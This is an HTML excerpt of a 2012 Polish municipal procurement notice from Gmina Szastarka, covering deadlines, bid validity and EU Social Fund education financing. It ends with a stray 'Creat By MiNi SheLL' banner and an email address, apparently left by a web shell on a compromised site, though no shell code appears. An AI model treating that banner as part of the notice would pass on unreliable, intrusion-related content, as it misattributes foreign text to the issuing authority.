<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminaszastarka.pl/bip/zamówieniapubliczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Szastarka, pokój nr. 11 w dniach i godzinach pracy Urzędu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.07.2012 godzina 09:00, miejsce: siedziba Zamawiającego, sekretariat, pokój nr 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach Europejskiego Funduszu Społecznego, Priorytetu IX Programu operacyjnego Kapitał Ludzki Rozwój wykształcenia i kompetencji    w regionach, Działanie 9.1, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com